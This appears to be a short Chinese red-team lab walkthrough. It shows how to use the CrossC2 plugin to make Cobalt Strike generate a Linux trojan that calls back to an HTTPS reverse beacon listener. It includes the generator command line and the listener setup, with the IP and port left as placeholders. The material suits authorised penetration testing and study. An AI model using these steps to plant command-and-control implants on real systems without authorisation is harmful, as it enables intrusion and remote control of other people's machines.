CobaltStrike上线Linux主机(CrossC2)

一、简述

CrossC2插件是为企业和红队人员提供的安全框架，支持 CobaltStrike 对其他平台的渗透测试（Linux / MacOS /...），支持自定义模块，并包括一些常用的渗透模块。

利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。

CrossC2插件项目地址：https://github.com/gloxec/CrossC2

受限描述：

• CobaltStrike：目前仅支持 cs 3.14版本，4.0可上线无法执行其他操作。

• Linux：对于特别旧的系统，您可以在 can 中选择"Linux-GLIBC"选项（2010 年左右）

• MacOS：最新系统仅支持 64 位程序

二、实验

1.genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

2.由于 Cross C2目前只支持HTTPS Beacon，所以在Listenrs中选择HTTPS进行监听，
服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

3.生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

4.执行木马上线

成功上线